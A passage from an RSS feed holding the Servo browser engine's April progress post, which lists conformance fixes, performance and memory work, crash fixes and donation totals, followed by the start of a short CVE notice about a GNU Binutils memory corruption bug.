<p>We’ve improved the default appearance of <strong>&lt;input type=file&gt;</strong> (<a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/servo/servo/pull/44496">#44496</a>) and <strong>&lt;textarea placeholder&gt;</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43770">#43770</a>).</p>
<p>All <strong>keyboard events</strong>, <strong>mouse events</strong>, <strong>wheel events</strong>, and <strong>pointer events</strong>, other than <strong>‘pointerenter’</strong> and <strong>‘pointerleave’</strong>, now <strong>bubble out of shadow roots</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/servo/servo/pull/43799">#43799</a>, <a href="https://github.com/servo/servo/pull/44094">#44094</a>).
<strong>‘error’ events</strong> on <strong>Window</strong> now report the correct <strong>filename</strong> (<strong>source</strong> in <strong>onerror</strong>) and <strong>lineno</strong> (<a href="https://github.com/Gae24">@Gae24</a>, <a href="https://github.com/servo/servo/pull/43632">#43632</a>).</p>
<p><strong>console.log()</strong> and friends now support <strong>printf-style formatting directives</strong>, although for now <code>%c</code> is ignored (<a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/servo/servo/pull/43897">#43897</a>).</p>
<p><strong>file: URLs</strong> are now considered <strong>secure contexts</strong>, so they can now use features like <strong>crypto.subtle</strong> and <strong>crypto.random­UUID</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/43989">#43989</a>).</p>
<p><strong>Exception messages</strong> have improved in Location, Static­Range, and the HTML­Element family of types (<a href="https://github.com/arihant2math">@arihant2math</a>, <a href="https://github.com/MuhammadMouostafa">@MuhammadMouostafa</a>, <a href="https://github.com/treetmitterglad">@treetmitterglad</a>, <a href="https://github.com/servo/servo/pull/44282">#44282</a>, <a href="https://github.com/servo/servo/pull/43260">#43260</a>, <a href="https://github.com/servo/servo/pull/43882">#43882</a>).</p>
<p>We’ve improved the conformance of <strong>fetch algorithms</strong> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/43970">#43970</a>, <a href="https://github.com/servo/servo/pull/43798">#43798</a>), <strong>focus</strong> and <strong>tab navigation</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43842">#43842</a>, <a href="https://github.com/servo/servo/pull/44029">#44029</a>, <a href="https://github.com/servo/servo/pull/44360">#44360</a>, <a href="https://github.com/servo/servo/pull/43859">#43859</a>, <a href="https://github.com/servo/servo/pull/44535">#44535</a>), <strong>form submission</strong> (<a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/servo/servo/pull/43700">#43700</a>), <strong>JS modules</strong> (<a href="https://github.com/elomscansio">@elomscansio</a>, <a href="https://github.com/Gae24">@Gae24</a>, <a href="https://github.com/servo/servo/pull/43741">#43741</a>, <a href="https://github.com/servo/servo/pull/44179">#44179</a>, <a href="https://github.com/servo/servo/pull/44042">#44042</a>), <strong>page navigation</strong> (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/43857">#43857</a>), <strong>&lt;svg view­Box&gt;</strong> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44420">#44420</a>), <strong>‘attr()’</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/43878">#43878</a>), <strong>‘:focus’</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43873">#43873</a>), <strong>‘font’</strong> (<a href="https://github.com/RichardTjokroutomo">@RichardTjokroutomo</a>, <a href="https://github.com/servo/servo/pull/44061">#44061</a>), <strong>‘@keyframes’</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/43461">#43461</a>), <strong>‘@property’</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/43878">#43878</a>), <strong>‘load’</strong> events (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/arabson99">@arabson99</a>, <a href="https://github.com/servo/servo/pull/43807">#43807</a>, <a href="https://github.com/servo/servo/pull/44046">#44046</a>), <strong>fetch­Later()</strong> (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/43627">#43627</a>), <strong>axes</strong> and <strong>buttons</strong> on <strong>Gamepad</strong> (<a href="https://github.com/log101">@log101</a>, <a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/servo/servo/pull/44411">#44411</a>, <a href="https://github.com/servo/servo/pull/44357">#44357</a>), <strong>copy­Tex­Image­2D()</strong> on <strong>Web­GL­Rendering­Context</strong> (<a href="https://github.com/simartin">@simartin</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43608">#43608</a>), <strong>tex­Image3D()</strong> on <strong>Web­GL2­Rendering­Context</strong> (<a href="https://github.com/simartin">@simartin</a>, <a href="https://github.com/servo/servo/pull/44367">#44367</a>), <strong>environment­Blend­Mode</strong> on <strong>XR­Session</strong> (<a href="https://github.com/msub2">@msub2</a>, <a href="https://github.com/servo/servo/pull/44155">#44155</a>), <strong>mark()</strong> and <strong>measure()</strong> on <strong>Performance</strong> (<a href="https://github.com/shubhamg13">@shubhamg13</a>, <a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44471">#44471</a>, <a href="https://github.com/servo/servo/pull/44199">#44199</a>, <a href="https://github.com/servo/servo/pull/43990">#43990</a>, <a href="https://github.com/servo/servo/pull/43753">#43753</a>), and <strong>Performance­Resource­Timing</strong> (<a href="https://github.com/shubhamg13">@shubhamg13</a>, <a href="https://github.com/servo/servo/pull/44228">#44228</a>).</p>
<p>We’ve fixed bugs related to <strong>console logging</strong> (<a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/servo/servo/pull/44243">#44243</a>), <strong>‘animation’</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44299">#44299</a>), <strong>‘box-shadow’</strong> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44474">#44474</a>, <a href="https://github.com/servo/servo/pull/44457">#44457</a>), <strong>‘display: contents’</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44551">#44551</a>, <a href="https://github.com/servo/servo/pull/44299">#44299</a>), <strong>‘display: inline-flex’</strong> (<a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/44281">#44281</a>), <strong>‘display: table-cell’</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/44550">#44550</a>), <strong>‘display: table-row-group’</strong> (<a href="https://github.com/Veercodeprog">@Veercodeprog</a>, <a href="https://github.com/servo/servo/pull/43674">#43674</a>), <strong>‘overflow-x: clip’</strong> and <strong>‘overflow-y: clip’</strong> (<a href="https://github.com/Messi002">@Messi002</a>, <a href="https://github.com/servo/servo/pull/43620">#43620</a>), <strong>‘position: absolute’</strong> on grid items (<a href="https://github.com/nicoburns">@nicoburns</a>, <a href="https://github.com/servo/servo/pull/44324">#44324</a>), <strong>‘word-spacing: &lt;percentage&gt;’</strong> (<a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/servo/servo/pull/44031">#44031</a>), <strong>remove­Child()</strong> on <strong>Document</strong> (<a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/servo/servo/pull/44133">#44133</a>), and <strong>URL.revoke­Object­URL()</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/43746">#43746</a>, <a href="https://github.com/servo/servo/pull/43977">#43977</a>, <a href="https://github.com/servo/servo/pull/44035">#44035</a>).</p>
<h3>Performance and stability <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#performance-and-stability">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>We’ve fixed some big inefficiencies in Servo.
<strong>append­Child()</strong> with nested shadow roots is no longer <math xmlns="http://www.w3.org/1998/Math/MathML"><mrow><mi>O</mi><mrow><mo>(</mo><msup><mn>2</mn><mi>n</mi></msup><mo>)</mo></mrow></mrow></math> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/servo/servo/pull/44016">#44016</a>), and we’ve halved the time it takes to load <a href="https://262.ecma-international.org/16.0/index.html">the ECMAScript spec</a> by fixing the <math xmlns="http://www.w3.org/1998/Math/MathML"><mrow><mi>O</mi><mrow><mo>(</mo><mtext>whole DOM tree</mtext><mo>)</mo></mrow></mrow></math> processing of <strong>‘id’</strong> and <strong>‘name’ attributes</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44120">#44120</a>, <a href="https://github.com/servo/servo/pull/44127">#44127</a>, <a href="https://github.com/servo/servo/pull/44117">#44117</a>).</p>
<p>Servo makes its <strong>first TLS connection</strong> in each session <strong>30–60 ms faster</strong> (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44242">#44242</a>), and we’ve instrumented the Servo and servoshell startup processes to find more opportunities for optimisation (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44443">#44443</a>, <a href="https://github.com/servo/servo/pull/44456">#44456</a>).</p>
<p>Like most browser engines, Servo is a multi-threaded (and sometimes multi-process) system requiring a great deal of IPC messages to keep everything connected.
<a href="https://book.servo.org/design-documentation/architecture.html">Two key components</a> of this system are the <strong>constellation</strong> thread, which manages the engine as a whole, and the <strong>script threads</strong> (or web processes), which render the web pages.
Sending these messages can be expensive though, so to <strong>reduce unnecessary IPC traffic</strong>, we’ve landed an optimisation that allows script threads to selectively receive only the relevant messages from the constellation (<a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/servo/servo/pull/43124">#43124</a>).</p>
<p>We’ve reduced the <strong>memory usage</strong> of each <strong>Attr</strong>, <strong>Text</strong>, and <strong>Character­Data</strong> node in the DOM by 16 bytes (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/44074">#44074</a>), and <strong>fixed a memory leak</strong> when deleting <strong>&lt;video controls&gt;</strong> or <strong>&lt;audio controls&gt;</strong> (<a href="https://github.com/Messi002">@Messi002</a>, <a href="https://github.com/servo/servo/pull/43983">#43983</a>).</p>
<p>Our <strong>about:memory</strong> page is more accurate now too, with new tracking of <strong>libc memory allocations</strong> on macOS, improved tracking of libc memory allocations on Linux (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44037">#44037</a>), and more accurate tracking of Path­Buf and types in <code>tokio</code>, <code>http</code>, <code>data­_url</code>, and <code>urlpattern</code> (<a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/servo/servo/pull/43858">#43858</a>).</p>
<p>Less memory usage isn’t always better in browser engines though, because there are many kinds of caches and other optimisations we can do to make browsing the web faster, at the expense of increased memory usage.
For example, we can greatly speed up <strong>prototype checks</strong> for DOM objects by storing a number in each object that identifies the concrete type, at the expense of making each DOM object 64 bits larger (<a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/servo/servo/pull/44364">#44364</a>).</p>
<p>Layout can now <strong>reuse fragments</strong> in later reflows, in many cases that involve block layout or ‘position: absolute’ (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/lukewarlow">@lukewarlow</a>, <a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/42904">#42904</a>, <a href="https://github.com/servo/servo/pull/44231">#44231</a>).
We’re also working on <strong>reusing shaping results</strong> in later reflows, and making inline layout more efficient (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44370">#44370</a>, <a href="https://github.com/servo/servo/pull/43974">#43974</a>, <a href="https://github.com/servo/servo/pull/44436">#44436</a>).</p>
<p>We’ve landed several changes that should reduce the <strong>binary size</strong> of Servo (<a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/nicoburns">@nicoburns</a>, <a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/servo/servo/pull/44227">#44227</a>, <a href="https://github.com/servo/servo/pull/44221">#44221</a>, <a href="https://github.com/servo/servo/pull/44303">#44303</a>, <a href="https://github.com/servo/servo/pull/44338">#44338</a>, <a href="https://github.com/servo/servo/pull/44428">#44428</a>, <a href="https://github.com/servo/servo/pull/44134">#44134</a>).</p>
<p>We’ve also reduced clones, allocations, borrow checks, GC rooting steps, and other operations in many parts of Servo (<a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44008">#44008</a>, <a href="https://github.com/servo/servo/pull/44544">#44544</a>, <a href="https://github.com/servo/servo/pull/44271">#44271</a>, <a href="https://github.com/servo/servo/pull/44279">#44279</a>, <a href="https://github.com/servo/servo/pull/43826">#43826</a>, <a href="https://github.com/servo/servo/pull/44052">#44052</a>, <a href="https://github.com/servo/servo/pull/44139">#44139</a>).</p>
<p>Several crashes have been fixed:</p>
<ul>
<li>in compressed­Tex­Sub­Image2D() on Web­GL­Rendering­Context (<a href="https://github.com/thebabalola">@thebabalola</a>, #44050)</li>
<li>in console.log() (<a href="https://github.com/thebabalola">@thebabalola</a>, <a href="https://github.com/servo/servo/pull/43844">#43844</a>)</li>
<li>in get­Data() on Data­Transfer (<a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/44607">#44607</a>)</li>
<li>in remove() on Element (<a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/44435">#44435</a>)</li>
<li>in replace­With() on Element (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44503">#44503</a>)</li>
<li>in <code>--debug-mozjs</code> builds (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/44386">#44386</a>, <a href="https://github.com/servo/servo/pull/44573">#44573</a>, <a href="https://github.com/servo/servo/pull/44581">#44581</a>)</li>
<li>in flex and grid layout (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/nicoburns">@nicoburns</a>, <a href="https://github.com/servo/servo/pull/44424">#44424</a>, <a href="https://github.com/servo/servo/pull/44203">#44203</a>)</li>
<li>in layout queries like <code>offset­Height</code> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44560">#44560</a>)</li>
<li>in the devtools Debugger tab, when stepping and when inspecting nested values (<a href="https://github.com/atbrakhi">@atbrakhi</a>, <a href="https://github.com/eerii">@eerii</a>, <a href="https://github.com/servo/servo/pull/44024">#44024</a>, <a href="https://github.com/servo/servo/pull/43995">#43995</a>)</li>
<li>when removing &lt;colgroup&gt; from the DOM (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/43846">#43846</a>)</li>
<li>when running garbage collection (<a href="https://github.com/drasticactions">@drasticactions</a>, <a href="https://github.com/servo/servo/pull/43933">#43933</a>)</li>
<li>when running servoshell with a <a href="https://doc.rust-lang.org/1.88.0/std/primitive.u64.html"><code>u64</code></a> <code>--pref</code> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44079">#44079</a>)</li>
<li>when shadow roots are deeply nested, or when calling attach­Shadow() removes elements from the flat tree (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43888">#43888</a>, <a href="https://github.com/servo/servo/pull/43930">#43930</a>, <a href="https://github.com/servo/servo/pull/44259">#44259</a>)</li>
<li>when <a href="https://storage.spec.whatwg.org/">web storage features</a> fail to write to disk or encounter SQLite errors (<a href="https://github.com/arihant2math">@arihant2math</a>, <a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/servo/servo/pull/43918">#43918</a>, <a href="https://github.com/servo/servo/pull/43949">#43949</a>)</li>
</ul>
<p>We fixed a crash in servoshell when pressing keys like Ctrl+2 or ⌘2 with not enough tabs open (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44070">#44070</a>).</p>
<p><strong>DOM data structures</strong> (<code>#[dom­_struct]</code>) can refer to one another, with the help of <a href="https://research.mozilla.org/2014/08/26/javascript-servos-only-garbage-collector/">garbage collection</a>.
But when DOM objects are being destroyed, those references can become invalid for a brief moment, depending on the order the GC finalizers run in.
This can be unsound if those references are accessed, which is a very easy mistake to make if the type has an <code>impl Drop</code>.
To help prevent that class of bug, we’re reworking our DOM types so that none of them have <code>#[dom­_struct]</code> and <code>impl Drop</code> at the same time (<a href="https://github.com/willypuzzle">@willypuzzle</a>, <a href="https://github.com/servo/servo/pull/44119">#44119</a>, <a href="https://github.com/servo/servo/pull/44501">#44501</a>, <a href="https://github.com/servo/servo/pull/44513">#44513</a>).</p>
<p>We’ve improved our static analysis for GC rooting (<a href="https://github.com/officialasishkumar">@officialasishkumar</a>, <a href="https://github.com/servo/servo/pull/44489">#44489</a>), and we’ve continued our long-running effort to <strong>use the Rust type system</strong> to make certain kinds of dynamic borrow failures impossible (<a href="https://github.com/sagudev">@sagudev</a>, <a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/elomscansio">@elomscansio</a>, <a href="https://github.com/Gae24">@Gae24</a>, <a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/nodelpit">@nodelpit</a>, <a href="https://github.com/servo/servo/pull/43174">#43174</a>, <a href="https://github.com/servo/servo/pull/43524">#43524</a>, <a href="https://github.com/servo/servo/pull/43928">#43928</a>, <a href="https://github.com/servo/servo/pull/43943">#43943</a>, <a href="https://github.com/servo/servo/pull/43942">#43942</a>, <a href="https://github.com/servo/servo/pull/43944">#43944</a>, <a href="https://github.com/servo/servo/pull/43946">#43946</a>, <a href="https://github.com/servo/servo/pull/43952">#43952</a>, <a href="https://github.com/servo/servo/pull/43975">#43975</a>, <a href="https://github.com/servo/servo/pull/44018">#44018</a>, <a href="https://github.com/servo/servo/pull/44175">#44175</a>, <a href="https://github.com/servo/servo/pull/44241">#44241</a>, <a href="https://github.com/servo/servo/pull/44368">#44368</a>, <a href="https://github.com/servo/servo/pull/44406">#44406</a>, <a href="https://github.com/servo/servo/pull/44441">#44441</a>, <a href="https://github.com/servo/servo/pull/44422">#44422</a>, <a href="https://github.com/servo/servo/pull/44475">#44475</a>, <a href="https://github.com/servo/servo/pull/44478">#44478</a>, <a href="https://github.com/servo/servo/pull/44484">#44484</a>, <a href="https://github.com/servo/servo/pull/44476">#44476</a>, <a href="https://github.com/servo/servo/pull/44490">#44490</a>, <a href="https://github.com/servo/servo/pull/44477">#44477</a>, <a href="https://github.com/servo/servo/pull/44494">#44494</a>, <a href="https://github.com/servo/servo/pull/44497">#44497</a>, <a href="https://github.com/servo/servo/pull/44498">#44498</a>, <a href="https://github.com/servo/servo/pull/44495">#44495</a>, <a href="https://github.com/servo/servo/pull/44505">#44505</a>, <a href="https://github.com/servo/servo/pull/44506">#44506</a>, <a href="https://github.com/servo/servo/pull/44507">#44507</a>, <a href="https://github.com/servo/servo/pull/44508">#44508</a>, <a href="https://github.com/servo/servo/pull/44509">#44509</a>, <a href="https://github.com/servo/servo/pull/44510">#44510</a>, <a href="https://github.com/servo/servo/pull/44512">#44512</a>, <a href="https://github.com/servo/servo/pull/44482">#44482</a>, <a href="https://github.com/servo/servo/pull/44527">#44527</a>, <a href="https://github.com/servo/servo/pull/44528">#44528</a>, <a href="https://github.com/servo/servo/pull/44531">#44531</a>, <a href="https://github.com/servo/servo/pull/44534">#44534</a>, <a href="https://github.com/servo/servo/pull/44542">#44542</a>, <a href="https://github.com/servo/servo/pull/44533">#44533</a>, <a href="https://github.com/servo/servo/pull/44543">#44543</a>, <a href="https://github.com/servo/servo/pull/44553">#44553</a>, <a href="https://github.com/servo/servo/pull/44547">#44547</a>, <a href="https://github.com/servo/servo/pull/44563">#44563</a>, <a href="https://github.com/servo/servo/pull/44562">#44562</a>, <a href="https://github.com/servo/servo/pull/44565">#44565</a>, <a href="https://github.com/servo/servo/pull/44558">#44558</a>, <a href="https://github.com/servo/servo/pull/44583">#44583</a>, <a href="https://github.com/servo/servo/pull/44606">#44606</a>, <a href="https://github.com/servo/servo/pull/44605">#44605</a>, <a href="https://github.com/servo/servo/pull/44608">#44608</a>, <a href="https://github.com/servo/servo/pull/44602">#44602</a>, <a href="https://github.com/servo/servo/pull/44584">#44584</a>, <a href="https://github.com/servo/servo/pull/44620">#44620</a>, <a href="https://github.com/servo/servo/pull/44590">#44590</a>, <a href="https://github.com/servo/servo/pull/44254">#44254</a>, <a href="https://github.com/servo/servo/pull/44628">#44628</a>, <a href="https://github.com/servo/servo/pull/44629">#44629</a>, <a href="https://github.com/servo/servo/pull/44638">#44638</a>, <a href="https://github.com/servo/servo/pull/44626">#44626</a>, <a href="https://github.com/servo/servo/pull/44081">#44081</a>).</p>
<p>Thanks to a wide range of people, we’ve also landed a bunch of cleanups and refactors (<a href="https://github.com/delan">@delan</a>, <a href="https://github.com/alice">@alice</a>, <a href="https://github.com/Skgland">@Skgland</a>, <a href="https://github.com/atbrakhi">@atbrakhi</a>, <a href="https://github.com/eerii">@eerii</a>, <a href="https://github.com/sabbCodes">@sabbCodes</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/thebabalola">@thebabalola</a>, <a href="https://github.com/CynthiaOketch">@CynthiaOketch</a>, <a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/rovertrack">@rovertrack</a>, <a href="https://github.com/webbeef">@webbeef</a>, <a href="https://github.com/arabson99">@arabson99</a>, <a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/nicoburns">@nicoburns</a>, <a href="https://github.com/longvatrong111">@longvatrong111</a>, <a href="https://github.com/niyabits">@niyabits</a>, <a href="https://github.com/treetmitterglad">@treetmitterglad</a>, <a href="https://github.com/foresterre">@foresterre</a>, <a href="https://github.com/mukilan">@mukilan</a>, <a href="https://github.com/elomscansio">@elomscansio</a>, <a href="https://github.com/freyacodes">@freyacodes</a>, <a href="https://github.com/StaySafe020">@StaySafe020</a>, <a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/servo/servo/pull/43772">#43772</a>, <a href="https://github.com/servo/servo/pull/44006">#44006</a>, <a href="https://github.com/servo/servo/pull/43860">#43860</a>, <a href="https://github.com/servo/servo/pull/44121">#44121</a>, <a href="https://github.com/servo/servo/pull/44160">#44160</a>, <a href="https://github.com/servo/servo/pull/43884">#43884</a>, <a href="https://github.com/servo/servo/pull/44154">#44154</a>, <a href="https://github.com/servo/servo/pull/44569">#44569</a>, <a href="https://github.com/servo/servo/pull/43939">#43939</a>, <a href="https://github.com/servo/servo/pull/44003">#44003</a>, <a href="https://github.com/servo/servo/pull/44110">#44110</a>, <a href="https://github.com/servo/servo/pull/44122">#44122</a>, <a href="https://github.com/servo/servo/pull/43824">#43824</a>, <a href="https://github.com/servo/servo/pull/44635">#44635</a>, <a href="https://github.com/servo/servo/pull/44103">#44103</a>, <a href="https://github.com/servo/servo/pull/43978">#43978</a>, <a href="https://github.com/servo/servo/pull/44092">#44092</a>, <a href="https://github.com/servo/servo/pull/44114">#44114</a>, <a href="https://github.com/servo/servo/pull/44277">#44277</a>, <a href="https://github.com/servo/servo/pull/44454">#44454</a>, <a href="https://github.com/servo/servo/pull/44274">#44274</a>, <a href="https://github.com/servo/servo/pull/44237">#44237</a>, <a href="https://github.com/servo/servo/pull/44232">#44232</a>, <a href="https://github.com/servo/servo/pull/44167">#44167</a>, <a href="https://github.com/servo/servo/pull/44214">#44214</a>, <a href="https://github.com/servo/servo/pull/43820">#43820</a>, <a href="https://github.com/servo/servo/pull/43825">#43825</a>, <a href="https://github.com/servo/servo/pull/43810">#43810</a>, <a href="https://github.com/servo/servo/pull/43838">#43838</a>, <a href="https://github.com/servo/servo/pull/43841">#43841</a>, <a href="https://github.com/servo/servo/pull/43847">#43847</a>, <a href="https://github.com/servo/servo/pull/43875">#43875</a>, <a href="https://github.com/servo/servo/pull/43876">#43876</a>, <a href="https://github.com/servo/servo/pull/43889">#43889</a>, <a href="https://github.com/servo/servo/pull/43893">#43893</a>, <a href="https://github.com/servo/servo/pull/43896">#43896</a>, <a href="https://github.com/servo/servo/pull/43881">#43881</a>, <a href="https://github.com/servo/servo/pull/43906">#43906</a>, <a href="https://github.com/servo/servo/pull/43913">#43913</a>, <a href="https://github.com/servo/servo/pull/43908">#43908</a>, <a href="https://github.com/servo/servo/pull/43917">#43917</a>, <a href="https://github.com/servo/servo/pull/43910">#43910</a>, <a href="https://github.com/servo/servo/pull/43921">#43921</a>, <a href="https://github.com/servo/servo/pull/43924">#43924</a>, <a href="https://github.com/servo/servo/pull/43925">#43925</a>, <a href="https://github.com/servo/servo/pull/43907">#43907</a>, <a href="https://github.com/servo/servo/pull/43923">#43923</a>, <a href="https://github.com/servo/servo/pull/43916">#43916</a>, <a href="https://github.com/servo/servo/pull/43909">#43909</a>, <a href="https://github.com/servo/servo/pull/43911">#43911</a>, <a href="https://github.com/servo/servo/pull/43957">#43957</a>, <a href="https://github.com/servo/servo/pull/43969">#43969</a>, <a href="https://github.com/servo/servo/pull/43967">#43967</a>, <a href="https://github.com/servo/servo/pull/43915">#43915</a>, <a href="https://github.com/servo/servo/pull/43954">#43954</a>, <a href="https://github.com/servo/servo/pull/43963">#43963</a>, <a href="https://github.com/servo/servo/pull/43959">#43959</a>, <a href="https://github.com/servo/servo/pull/43955">#43955</a>, <a href="https://github.com/servo/servo/pull/44067">#44067</a>, <a href="https://github.com/servo/servo/pull/44068">#44068</a>, <a href="https://github.com/servo/servo/pull/44071">#44071</a>, <a href="https://github.com/servo/servo/pull/44084">#44084</a>, <a href="https://github.com/servo/servo/pull/44265">#44265</a>, <a href="https://github.com/servo/servo/pull/44115">#44115</a>, <a href="https://github.com/servo/servo/pull/44358">#44358</a>, <a href="https://github.com/servo/servo/pull/43848">#43848</a>).</p>
<h3>Donations <a class="header-anchor" href="https://servo.org/blog/2026/05/31/april-in-servo/#donations">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>Thanks again for your generous support!
We are now receiving <strong>7349 USD/month</strong> (+2.5% from March) in recurring donations.
This helps us cover the cost of our <strong><a href="https://ci0.servo.org/">speedy</a> <a href="https://ci1.servo.org/">CI</a> <a href="https://ci2.servo.org/">and</a> <a href="https://ci3.servo.org/">benchmarking</a> <a href="https://ci4.servo.org/">servers</a></strong>, one of our latest <strong><a href="https://www.outreachy.org/alums/2025-06/#:~:text=Servo">Outreachy interns</a></strong>, and funding <strong><a href="https://servo.org/blog/2025/09/17/your-donations-at-work-funding-jdm/">maintainer work</a></strong> that helps more people contribute to Servo.</p>
<p>Servo is also on <a href="https://thanks.dev/">thanks.dev</a>, and already <strong>33 GitHub users</strong> (−4 from March) that depend on Servo are sponsoring us there.
If you use Servo libraries like <a href="https://crates.io/crates/url/reverse_dependencies">url</a>, <a href="https://crates.io/crates/html5ever/reverse_dependencies">html5ever</a>, <a href="https://crates.io/crates/selectors/reverse_dependencies">selectors</a>, or <a href="https://crates.io/crates/cssparser/reverse_dependencies">cssparser</a>, signing up for <a href="https://thanks.dev/">thanks.dev</a> could be a good way for you (or your employer) to give back to the community.</p>
<p>We now have <a href="https://servo.org/blog/2025/11/21/sponsorship-tiers/"><strong>sponsorship tiers</strong></a> that allow you or your organisation to donate to the Servo project with public acknowlegement of your support.
If you’re interested in this kind of sponsorship, please contact us at <a href="mailto:join@servo.org">join@servo.org</a>.</p>
<figure class="_fig"><div class="_flex">
    <div>
        <div><strong>7349</strong> USD/month</div>
        <div></div>
        <div></div>
        <div><strong>10000</strong></div>
    </div>
    <progress max="10000" value="7349"></progress>
</div></figure>
<p>Use of donations is decided transparently via the Technical Steering Committee’s public <strong><a href="https://github.com/servo/project/blob/main/FUNDING_REQUEST.md">funding request process</a></strong>, and active proposals are tracked in <a href="https://github.com/servo/project/issues/187">servo/project#187</a>.
For more details, head to our <a href="https://servo.org/sponsorship/">Sponsorship page</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-1179 | GNU Binutils 2.43 ld bfd/libbfd.c bfd_putl64 memory corruption (Nessus ID 275490 / WID-SEC-2026-1730)]]></title>
<description><![CDATA[A vulnerability has been found in GNU Binutils 2.43 and classified as critical. The affected element is the function bfd_putl64 of the file bfd/libbfd.c of the component ld. This manipulation causes memory corruption.

This vulnerability is handled as CVE-2025-1179. The attack can be initiated re...]]></description>
